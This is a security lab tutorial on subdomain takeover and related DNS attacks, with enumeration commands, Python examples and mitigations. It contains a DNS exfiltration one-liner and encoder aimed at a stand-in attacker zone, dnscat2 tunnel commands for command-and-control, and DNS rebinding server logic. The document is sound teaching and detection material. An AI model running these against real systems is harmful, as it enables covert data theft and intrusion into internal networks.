Lab 4: Advanced Subdomain Takeover

Advanced subdomain takeover vulnerabilities

Difficulty: High

Lab Overview

This lab covers subdomain takeover beyond the basic single dangling-CNAME case: wildcard records, enumeration at scale, and takeovers of names that point at CDNs, load balancers, API gateways and other third-party services. It also covers four DNS attacks that are often grouped with takeover but are distinct from it: DNS rebinding, cache poisoning, tunneling and exfiltration. None of those four needs a dangling record; they are included because they share the same building block, an attacker who answers DNS queries authoritatively for some name, and a takeover (or a dangling NS delegation) can hand an attacker that control inside the target's own domain.

Objective: Understand how each technique works, how to confirm it against a target you are authorized to test, and how to tell a genuine takeover from a false positive.

Techniques Covered

  • Wildcard Takeover - a wildcard record (*.example.com) pointing at a deprovisioned third-party resource makes every otherwise-undefined name in the zone claimable at once
  • DNS Rebinding - an attacker-controlled name resolves first to the attacker's web server and then, after a near-zero TTL, to an internal address, so the attacker's page reaches the internal host under the same origin
  • Subdomain Enumeration - discovering candidate names from certificate transparency, passive sources, brute force and search engines before testing each for a dangling record
  • DNS Poisoning - injecting a forged answer into a recursive resolver's cache so a legitimate name resolves to an attacker address for every client of that resolver
  • DNS Tunneling - carrying a two-way channel inside queries and responses for an attacker-controlled zone
  • DNS Exfiltration - encoding stolen data into query names for an attacker-controlled zone

Only the first is a takeover in the strict sense. The rest are here because each depends on controlling authoritative DNS for a name, and a taken-over subdomain or dangling NS delegation provides exactly that, with the added benefit that the traffic looks like it belongs to the victim's domain.
Vulnerability Details
  • Type: Subdomain takeover via dangling DNS records (wildcard or per-name), plus the related DNS attacks listed above
  • Severity: High to Critical. A taken-over name inherits the parent domain's trust: cookies scoped to .example.com are sent to it, wildcard entries in CSP and CORS allowlists admit it, OAuth redirect URIs registered as *.example.com accept it, and domain-validated certificate issuance (for example ACME HTTP-01) will give the attacker a valid TLS certificate for it
  • Method: Enumerate names, resolve each record chain, identify targets that no longer exist or can be claimed, then claim them in a test account and prove control with a harmless marker page
  • Issue: DNS records outlive the resources they point at, and nothing in DNS verifies that the target of a CNAME is still owned by the zone owner
Attack Vectors
  • Wildcard Takeover: one dangling wildcard record exposes every undefined name in the zone
  • DNS Rebinding: attacker-controlled DNS used to reach internal services from a victim's browser
  • Subdomain Enumeration: the discovery step that feeds every other technique here; a wildcard zone makes naive brute forcing report every guess as a hit
  • DNS Poisoning: forged answers cached by a shared resolver, affecting its clients rather than the zone itself
Advanced Subdomain Takeover Examples

Use these techniques to find and confirm advanced subdomain takeover vulnerabilities on targets you are authorized to test:

1. Wildcard Subdomain Takeover:
# Do not test for a wildcard by querying the literal name "*.example.com":
# the shell may glob the asterisk, and a literal "*" query only returns the
# wildcard record itself, which tells you nothing about the names a client
# would actually ask for. Query a few random labels instead; if they all
# resolve to the same answer, the zone has a wildcard.
dig +short $(openssl rand -hex 6).example.com
dig +short $(openssl rand -hex 6).example.com
dig +short $(openssl rand -hex 6).example.com CNAME
# A wildcard on its own is not a vulnerability. It becomes a takeover when
# the wildcard's target is a third-party resource that no longer exists
# (a CNAME to a deleted bucket, app or hosted site) and the provider lets
# anyone claim that hostname. Then every undefined name in the zone
# (random123.example.com, test.example.com, admin.example.com, ...)
# resolves to a resource the attacker can register, without the attacker
# touching the victim's DNS.
# Confirm: resolve the wildcard's target, check for NXDOMAIN or the
# provider's "resource not found" response, claim the target in a test
# account, then verify that one random subdomain serves your marker page.
# Caveat: a wildcard also defeats naive brute forcing, since every guessed
# name "resolves". Compare answers against the random-label baseline to
# filter those false positives before reporting.
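The random-label check and the brute-force filter described above, as an added example that is not part of the lab. The zone is a constructed lookup table that emulates wildcard synthesis; the provider hostnames are placeholders, and for real use resolve() would be replaced by dnspython or dig.

```python
"""Added example (not from the lab): detect a wildcard record by probing
random labels, then drop wildcard-covered names from a brute-force result
set. ZONE is constructed; provider hostnames are placeholders."""
import secrets

# Constructed zone data: name -> (type, value). Names not present are NXDOMAIN
# unless the wildcard covers them.
ZONE = {
    "www.example.com":  ("A", "198.51.100.7"),
    "mail.example.com": ("A", "198.51.100.8"),
    "old.example.com":  ("CNAME", "old-example.pages.provider-a.test"),
    "*.example.com":    ("CNAME", "example-site.edge.provider-d.test"),
}


def resolve(name):
    """Emulate wildcard synthesis: an explicit record wins; otherwise the
    wildcard directly above the name applies. (Assumed simplification of
    RFC 4592, which also lets existing intermediate names block a wildcard.)"""
    if name in ZONE:
        return ZONE[name]
    parts = name.split(".", 1)
    if len(parts) == 2 and "*." + parts[1] in ZONE:
        return ZONE["*." + parts[1]]
    return None


def wildcard_answer(apex, probes=3):
    """Query several random labels under apex. If all resolve to the same
    answer, that answer is the wildcard's; returns None when there is none.
    This is the check that a literal 'dig *.example.com' does not perform."""
    answers = {resolve(f"{secrets.token_hex(6)}.{apex}") for _ in range(probes)}
    if len(answers) == 1 and None not in answers:
        return answers.pop()
    return None


def wildcard_target_is_external(wc, apex):
    """A wildcard is takeover-relevant only when it hands every undefined
    name to a resource outside the zone (a CNAME to a third-party host)."""
    return wc is not None and wc[0] == "CNAME" and not wc[1].endswith("." + apex)


def filter_bruteforce(candidates, apex):
    """Return (wildcard_answer, real_names). Names whose answer equals the
    wildcard's are synthesised and carry no information of their own."""
    wc = wildcard_answer(apex)
    real = []
    for name in candidates:
        ans = resolve(name)
        if ans is None or (wc is not None and ans == wc):
            continue
        real.append(name)
    return wc, real


if __name__ == "__main__":
    wc, real = filter_bruteforce(
        ["www.example.com", "old.example.com", "admin.example.com", "test.example.com"],
        "example.com")
    print("wildcard:", wc, "external target:", wildcard_target_is_external(wc, "example.com"))
    print("real records:", real)
```

Comparing DNS answers is a heuristic: a name explicitly configured to the same CDN target as the wildcard is dropped too. When hunting takeovers in a wildcard zone, also compare the HTTP response for a random label against each candidate, since the provider side may treat a configured hostname differently from an unknown one.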
2. DNS Rebinding Attack:
# Rebinding is not a takeover by itself: it needs a name whose authoritative
# DNS the attacker controls. That can be a domain the attacker owns, or a
# subdomain of the target whose NS delegation dangles.
# 1. Run an authoritative DNS server for the attacker-controlled name
# 2. First answer: the attacker's web server, with TTL 0 (or as low as the
#    resolver honours). The victim's browser loads the attacker's
#    JavaScript from that origin.
# 3. Second answer, for the same name once the TTL expires: an internal or
#    loopback address (for example 127.0.0.1 or 10.0.0.5)
# 4. The page's JavaScript now sends requests to that internal address, and
#    because the hostname has not changed the browser treats them as
#    same-origin and lets the script read the responses
# Malicious DNS server behaviour (attacker IP first, internal IP second):
# Query 1: rebind.example.com -> 203.0.113.10   (attacker's web server)
# Query 2: rebind.example.com -> 127.0.0.1      (service next to the victim)
# Caveats: browsers and OS resolvers cache results for a while regardless
# of TTL, so the victim has to stay on the page; services that validate the
# Host header, or that require authentication the script does not have,
# are not reachable this way.
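The server-side decision logic for the two-answer sequence above, as an added example that is not part of the lab. The addresses, the rebinding name and the query packet are constructed; the code builds raw DNS messages with struct and does not bind a socket, so wiring it to a UDP listener is left to the reader.

```python
"""Added example (not from the lab): decision logic of a DNS rebinding
server. The first A query from a given client for the rebinding name gets
the attacker's web server address; every later one gets the internal
target address; both carry TTL 0. Addresses and the name are assumptions."""
import socket
import struct

ATTACKER_IP = "203.0.113.10"   # hosts the page carrying the attacker's JavaScript
TARGET_IP = "127.0.0.1"        # where the same name points once the script runs
REBIND_NAME = "rebind.example.com"
_seen = {}                      # (client address, qname) -> A queries answered so far


def parse_query(pkt):
    """Return (txid, qname, qtype, question_section) from a standard query."""
    txid, _flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, pos = [], 12
    while pkt[pos] != 0:
        n = pkt[pos]
        labels.append(pkt[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    pos += 1                                   # skip the root label
    qtype, _qclass = struct.unpack("!HH", pkt[pos:pos + 4])
    return txid, ".".join(labels), qtype, pkt[12:pos + 4]


def choose_ip(client, qname):
    """First A query from a client: attacker's server. Later ones: the target.
    Per-client state is what makes one name 'move' under the victim's feet."""
    key = (client, qname.lower())
    _seen[key] = _seen.get(key, 0) + 1
    return ATTACKER_IP if _seen[key] == 1 else TARGET_IP


def build_response(txid, question, ip, ttl=0):
    """Authoritative response with one A record; the RR name is a compression
    pointer (0xC00C) back to the question name at offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 0, 0)
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + rr


def handle(pkt, client):
    """Produce the response bytes for one query from `client`."""
    txid, qname, qtype, question = parse_query(pkt)
    if qname.lower() != REBIND_NAME:
        return struct.pack("!HHHHHH", txid, 0x8403, 1, 0, 0, 0) + question  # NXDOMAIN
    if qtype != 1:
        return struct.pack("!HHHHHH", txid, 0x8400, 1, 0, 0, 0) + question  # NOERROR, no data
    return build_response(txid, question, choose_ip(client, qname))


def make_query(txid, name, qtype=1):
    """Constructed client query standing in for real resolver traffic."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def answer_ip(resp):
    """Address in the single A record of a response built above."""
    return socket.inet_ntoa(resp[-4:])


def answer_ttl(resp):
    return struct.unpack("!I", resp[-10:-6])[0]


def rcode(resp):
    return struct.unpack("!H", resp[2:4])[0] & 0xF


if __name__ == "__main__":
    q = make_query(0x1234, REBIND_NAME)
    for _ in range(2):
        resp = handle(q, "198.51.100.50")
        print(answer_ip(resp), "ttl", answer_ttl(resp))
```

In practice the "client" seen by this server is the victim's recursive resolver, not the browser, so the per-client counter flips for everyone behind that resolver; real rebinding tools key on a random per-victim label instead. TTL 0 is a request, not a guarantee: resolvers and browsers impose their own minimum cache times, which is why the attack page has to keep retrying.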
3. Advanced Subdomain Enumeration:
# Passive sources (no traffic to the target)
subfinder -d example.com -all -o subs.txt
amass enum -passive -d example.com -o subs.txt
assetfinder --subs-only example.com
findomain -t example.com
# Certificate transparency: crt.sh is a website, not a command. Query its
# JSON endpoint and pull the names out of the name_value field, which holds
# one SAN per line.
curl -s 'https://crt.sh/?q=%25.example.com&output=json' \
  | python3 -c 'import json,sys; [print(n) for r in json.load(sys.stdin) for n in r["name_value"].splitlines()]' \
  | sort -u
# DNS brute forcing (-t brt needs a wordlist, supplied with -D)
dnsrecon -d example.com -t brt -D wordlist.txt
# Search engine dorking
site:example.com -site:www.example.com
# Then resolve everything and keep the CNAME chains; those are the takeover
# candidates:
while read h; do echo "$h $(dig +short "$h" CNAME | tr '\n' ' ')"; done < subs.txt
# Caveat: in a zone with a wildcard, every brute-forced name resolves.
# Filter results against a random-label baseline before reporting.
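Turning certificate transparency output into a clean candidate list, as an added example that is not part of the lab. The JSON is constructed in crt.sh's shape (a list of records whose name_value field holds newline-separated SANs); the wordlist and domain names are assumptions.

```python
"""Added example (not from the lab): normalise crt.sh-style JSON into
in-scope hostnames, separate wildcard SANs (which name a namespace to brute
force, not a host), drop SANs from other domains on shared certificates,
and merge with wordlist guesses. CT_JSON and WORDLIST are constructed."""
import json

CT_JSON = json.dumps([
    {"issuer_name": "C=US, O=Example CA", "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Example CA", "name_value": "*.staging.example.com"},
    {"issuer_name": "C=US, O=Example CA", "name_value": "Old-Blog.example.com.\nexample.com"},
    {"issuer_name": "C=US, O=Example CA", "name_value": "api.example.com\nexample-partner.net"},
    {"issuer_name": "C=US, O=Example CA", "name_value": "www.example.com"},   # reissued cert
])

WORDLIST = ["www", "dev", "staging", "admin", "old-blog"]


def ct_names(raw_json, apex):
    """Return (hosts, wildcard_namespaces): lowercase, trailing dot stripped,
    limited to apex and its subdomains."""
    hosts, wildcards = set(), set()
    for entry in json.loads(raw_json):
        for raw in entry["name_value"].split("\n"):
            name = raw.strip().lower().rstrip(".")
            if name != apex and not name.endswith("." + apex):
                continue                    # SAN for another domain on a shared cert
            if name.startswith("*."):
                wildcards.add(name[2:])
            else:
                hosts.add(name)
    return hosts, wildcards


def candidates(raw_json, apex, wordlist):
    """Merge CT hosts with wordlist guesses under the apex and under every
    wildcard namespace CT revealed. Returns (sorted_hosts, sorted_wildcards)."""
    hosts, wildcards = ct_names(raw_json, apex)
    bases = {apex} | wildcards
    guessed = {f"{w}.{b}" for b in bases for w in wordlist}
    return sorted(hosts | guessed), sorted(wildcards)


if __name__ == "__main__":
    hosts, wildcards = candidates(CT_JSON, "example.com", WORDLIST)
    print("\n".join(hosts))
    print("wildcard namespaces:", wildcards)
```

Every name that comes out of this still has to be resolved; CT proves a certificate was issued for the name at some point, not that a record exists today, and the names whose records are gone while the CT entry remains are often exactly the decommissioned hosts worth checking.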
4. DNS Poisoning Attack:
# Cache poisoning targets a shared recursive resolver, not the target's
# zone, so it is not a subdomain takeover: the real records stay intact and
# only the clients of the poisoned resolver are affected.
# 1. Trigger the resolver to look up a name in the target zone
# 2. Race the legitimate authoritative server with forged responses that
#    match the outstanding query's transaction ID and source port
# 3. The forged answer points the name at an attacker address and is cached
#    for its TTL
# 4. Clients of that resolver reach the attacker's server, which can serve a
#    phishing page and capture credentials
# Example outcome:
# subdomain.example.com -> 203.0.113.10 (attacker) for every client of the resolver
# Caveats: with random transaction IDs and source ports a forged packet has
# to match roughly 32 bits of entropy per attempt, and a DNSSEC-validating
# resolver rejects unsigned forgeries for a signed zone. Against a zone
# without DNSSEC, a takeover is usually the cheaper route to the same result
# of "the attacker answers for a name in the target's domain".
5. DNS Tunneling:
# Tunneling carries a two-way channel inside DNS queries and responses for a
# zone whose authoritative server the attacker runs. It is a covert channel
# through egress filtering, not a takeover, but a dangling NS delegation in
# the victim's own domain makes the traffic look internal.
# 1. Delegate a zone (NS record) to a host the attacker controls
# 2. Run the tunnel server there
# 3. Run the client inside the restricted network; it only needs to reach a
#    recursive resolver that forwards queries to the internet
# 4. Use the channel for command and control and persistence
# Tools: iodine (IP over DNS), dns2tcp (TCP over DNS), dnscat2 (shell / C2)
# dnscat2, as documented by the project:
ruby ./dnscat2.rb t.example.com      # server, authoritative for t.example.com
./dnscat t.example.com               # client, talks through the local resolver
6. DNS Exfiltration:
# The one-way variant: data leaves in query names and nothing needs to come
# back beyond an ordinary answer.
# 1. Chunk the data and encode each chunk as DNS labels
# 2. Send queries for <chunk>.<sequence>.exfil.example.com
# 3. The attacker's authoritative server logs the query names and
#    reassembles the data
# 4. The traffic blends in with ordinary lookups unless query names, volume
#    or label entropy are monitored
# Encoding caveat: DNS names are case-insensitive and many resolvers
# randomize case in transit (0x20 encoding), so base64 is corrupted on the
# way. Use hex or base32, keep each label at most 63 bytes and the whole
# name at most 253 bytes.
printf 'sensitive data' | xxd -p | nl -n rz -w 4 | \
  while read seq chunk; do dig +short "$chunk.$seq.exfil.example.com"; done
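The encoding, reassembly and detection sides of the exfiltration scheme above (which is also the outbound half of a tunnel, so this block serves items 5 and 6), as an added example that is not part of the lab. The zone name, the sample secret, the resolver log lines and the detection thresholds are constructed assumptions, and nothing here sends packets.

```python
"""Added example (not from the lab): encode data into DNS query names,
reassemble it from authoritative-server logs, and flag such traffic in a
resolver log. ZONE, SECRET, QUERY_LOG and the thresholds are constructed."""
import base64
import math
from collections import Counter, defaultdict

MAX_LABEL = 63     # RFC 1035 label limit
MAX_NAME = 253     # practical limit for a textual name
ZONE = "exfil.example.com"


def encode_chunks(data, zone, chunk_bytes=30):
    """Split data into names <base32chunk>.s<seq>.<zone>. Base32, not base64:
    resolvers may flip label case in transit (0x20 encoding), and base32
    decoding ignores case, so the data survives."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk_bytes)):
        enc = base64.b32encode(data[off:off + chunk_bytes]).decode().rstrip("=").lower()
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        name = ".".join(labels + [f"s{seq}", zone])
        if len(name) > MAX_NAME:
            raise ValueError("chunk_bytes too large for this zone name")
        names.append(name)
    return names


def decode_chunks(names, zone):
    """Reassemble from logged query names, in any order, tolerating repeats
    and case changes."""
    suffix = "." + zone.lower()
    parts = {}
    for name in names:
        low = name.lower().rstrip(".")
        if not low.endswith(suffix):
            continue
        labels = low[:-len(suffix)].split(".")
        seq = int(labels[-1][1:])
        enc = "".join(labels[:-1]).upper()
        enc += "=" * (-len(enc) % 8)             # restore base32 padding
        parts[seq] = base64.b32decode(enc)
    return b"".join(parts[i] for i in sorted(parts))


def shannon_entropy(s):
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())


def suspicious_zones(query_log, min_queries=20, min_label=30, min_entropy=3.0):
    """Group names by their last two labels (an assumed simplification that
    ignores public-suffix rules) and flag zones that received many distinct,
    long, high-entropy leftmost labels. A single CDN asset hash looks the
    same; the count threshold is what separates a stream from a one-off."""
    first_labels = defaultdict(set)
    for name in query_log:
        labels = name.lower().rstrip(".").split(".")
        if len(labels) >= 3:
            first_labels[".".join(labels[-2:])].add(labels[0])
    flagged = {}
    for zone, firsts in first_labels.items():
        hits = [l for l in firsts if len(l) >= min_label and shannon_entropy(l) >= min_entropy]
        if len(hits) >= min_queries:
            flagged[zone] = len(hits)
    return flagged


# Constructed sample: a credentials dump, and a resolver log mixing normal
# lookups, one CDN-style hash name, and the exfiltration queries.
SECRET = "".join(f"record {i:03d}: user=user{i} password=P{i * 7919:x}!\n" for i in range(24)).encode()
EXFIL_QUERIES = encode_chunks(SECRET, ZONE)
QUERY_LOG = (["www.example.org", "mail.example.org", "api.example.org"] * 10
             + ["0123456789abcdef0123456789abcdef.static.example.net"]
             + EXFIL_QUERIES)

if __name__ == "__main__":
    print(len(EXFIL_QUERIES), "queries;", "first:", EXFIL_QUERIES[0])
    print("flagged zones:", suspicious_zones(QUERY_LOG))
```

On the detection side the useful signal is per zone over a window, not per query: long random-looking labels alone produce false positives from CDNs, anti-virus lookups and DNS-based reputation services, while a zone that receives dozens of distinct such labels from one client in a few minutes rarely has an innocent explanation.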
7. Subdomain Takeover via Third-Party Services (CDN, Load Balancer, API Gateway, WAF and DDoS Protection, Email, Analytics, Monitoring):
# These cases share one mechanism, so they are treated together. The
# precondition is always the same: a record in the target's zone points at
# a resource hosted by someone else, that resource has been deleted, and
# the provider lets a new customer claim the same hostname or endpoint.
# 1. Collect every CNAME (and every A/AAAA record to a cloud-allocated
#    address) in the zone
# 2. Classify each target by provider from its hostname suffix: CDN
#    distribution, load balancer, API gateway custom domain, hosted email
#    or link-branding domain, status page, and so on
# 3. Check whether the target still exists: NXDOMAIN on the target name,
#    or the provider's own "resource not found" response over HTTP
# 4. Check whether the provider lets it be claimed: some verify domain
#    ownership before a custom hostname can be attached (then there is a
#    dangling record but no takeover), others do not
# 5. In a test account, claim the resource, serve a harmless marker page to
#    prove control, and report
# Notes on the individual categories:
# - CDN, WAF and DDoS-protection fronts (Cloudflare, AWS Shield and similar)
#   are the same check: the customer's CNAME points at the provider's edge,
#   and the questions are whether the provider still knows the hostname and
#   whether it verifies ownership before another customer can add it.
# - Load balancers and API gateways (for example AWS ALB or API Gateway
#   custom domains) hand out provider-generated hostnames; a CNAME to a
#   deleted one is dangling. Whether an attacker can obtain the same
#   generated name depends on how the provider allocates them, so verify
#   rather than assume.
# - "Takeover via SSL certificate" is not a separate vector. The certificate
#   is a consequence: once an attacker controls what a hostname serves,
#   domain-validated issuance (for example ACME HTTP-01) gives them a valid
#   certificate for it, and the issuance shows up in certificate
#   transparency logs.
# - Email services (SendGrid and similar) and monitoring or status-page
#   products (New Relic and similar) matter when the customer CNAMEd a
#   branded hostname to the provider and later cancelled the service.
#   Analytics products embedded by script tag rather than by DNS (Google
#   Analytics) have no DNS record to dangle and are not a takeover surface.
# Validation before reporting:
dig +short target-sub.example.com CNAME          # what does it point at?
dig +short "$(dig +short target-sub.example.com CNAME)"   # NXDOMAIN, or still resolves?
curl -sk -o /dev/null -w '%{http_code}\n' https://target-sub.example.com/
# Then read the body for the provider's not-found fingerprint, and only
# then attempt the claim in a throwaway account.
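The classification steps above (resolve the chain, identify the provider, test for "gone", test for "claimable") as an added example that is not part of the lab. The DNS table, HTTP bodies, provider suffixes, not-found fingerprints and the verifies_ownership flags are all constructed for illustration and describe no real provider; swap in real DNS and HTTP lookups when testing a target you are authorized to assess.

```python
"""Added example (not from the lab): classify a zone's external records as
live, dangling-but-ownership-verified, or dangling-and-claimable. DNS, HTTP
and PROVIDERS are constructed and do not describe real providers."""
from dataclasses import dataclass
from typing import Optional

# Constructed DNS: name -> ("CNAME", target) | ("A", ip); None means NXDOMAIN
DNS = {
    "blog.example.com":   ("CNAME", "example-blog.pages.provider-a.test"),
    "api.example.com":    ("CNAME", "d1a2b3.gw.provider-b.test"),
    "status.example.com": ("CNAME", "example.status.provider-c.test"),
    "*.example.com":      ("CNAME", "example-cdn.edge.provider-d.test"),
    "www.example.com":    ("A", "198.51.100.7"),
    "example-blog.pages.provider-a.test": None,              # page deleted
    "d1a2b3.gw.provider-b.test": None,                       # gateway deleted
    "example.status.provider-c.test": ("A", "198.51.100.9"),
    "example-cdn.edge.provider-d.test": ("A", "198.51.100.11"),
}

# Constructed HTTP bodies returned when the customer hostname is requested
HTTP = {
    "status.example.com": "404: There is no status page configured for this domain.",
    "*.example.com": "Welcome to the example CDN site",
}


@dataclass(frozen=True)
class Provider:
    suffix: str                 # CNAME target suffix identifying the provider
    not_found: Optional[str]    # lowercase body fingerprint of a deleted resource (assumed)
    verifies_ownership: bool    # custom hostnames require domain proof? (assumed)


PROVIDERS = [
    Provider(".pages.provider-a.test", None, False),
    Provider(".gw.provider-b.test", None, True),
    Provider(".status.provider-c.test", "no status page configured", False),
    Provider(".edge.provider-d.test", "site not found", True),
]


def resolve_chain(name, max_hops=8):
    """Follow CNAMEs. Returns (chain, final_record); final_record is None on NXDOMAIN."""
    chain = [name]
    for _ in range(max_hops):
        rec = DNS.get(name)
        if rec is None or rec[0] != "CNAME":
            return chain, rec
        name = rec[1]
        chain.append(name)
    raise RuntimeError(f"CNAME chain too long or looping: {chain}")


def provider_for(target):
    return next((p for p in PROVIDERS if target.endswith(p.suffix)), None)


def classify(name):
    rec = DNS.get(name)
    if rec is None or rec[0] != "CNAME":
        return "not-external"      # in-zone A/AAAA records need an IP-reuse check instead
    chain, final = resolve_chain(name)
    prov = provider_for(chain[1])
    if prov is None:
        return "external-unknown-provider"
    body = HTTP.get(name, "").lower()
    gone = final is None or (prov.not_found is not None and prov.not_found in body)
    if not gone:
        return "live"
    return "dangling-verified" if prov.verifies_ownership else "dangling-claimable"


def audit(names):
    """Classify each name; a claimable wildcard gets its own label because it
    exposes every undefined name in the zone at once."""
    result = {}
    for n in names:
        c = classify(n)
        result[n] = c + "-wildcard" if n.startswith("*.") and c == "dangling-claimable" else c
    return result


if __name__ == "__main__":
    for name, verdict in audit(["blog.example.com", "api.example.com", "status.example.com",
                                "*.example.com", "www.example.com"]).items():
        print(f"{name:22} {verdict}")
```

Two findings in this constructed data need a human before they are reported: api.example.com is dangling but the provider verifies ownership, so it is hygiene, not a takeover; status.example.com resolves fine and is only caught by the HTTP fingerprint, which is the case that NXDOMAIN-only scanners miss.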
Real-World Attack Scenarios
Mitigation Strategies
  • Keep an inventory of every DNS record that points outside the zone (CNAMEs, and A/AAAA records to cloud-allocated addresses) together with the owner of the target resource
  • Make record removal part of decommissioning: delete the DNS record before, not after, the bucket, app, distribution or load balancer it points at
  • Never leave a wildcard record pointing at a third-party service; a wildcard should terminate on infrastructure the organization controls
  • Prefer providers that verify domain ownership before a custom hostname can be attached, and use their verification records where offered
  • Re-run the dangling-record check on a schedule (certificate transparency and passive DNS feeds make the enumeration step cheap) and alert on NXDOMAIN targets and provider not-found responses
  • Watch certificate transparency for certificates issued for your names that nobody requested; a takeover often shows up there first
  • Treat registrar and DNS provider accounts as highest-value: multi-factor authentication, least-privilege roles, and change logging with alerts on NS, CNAME and wildcard changes
  • For resolvers you operate: source-port and transaction-ID randomization, DNSSEC validation, and no open recursion, which closes the classic poisoning path
  • For egress: log query names and volumes per zone and alert on streams of long, high-entropy labels or unusual query rates to a single zone (tunneling and exfiltration)
  • For applications: scope cookies to the host that needs them rather than the parent domain, avoid wildcard entries in CSP and CORS allowlists, and validate the Host header, which blunts both a takeover and rebinding
  • Include subdomain takeover in regular external testing and in the scope of bug bounty programs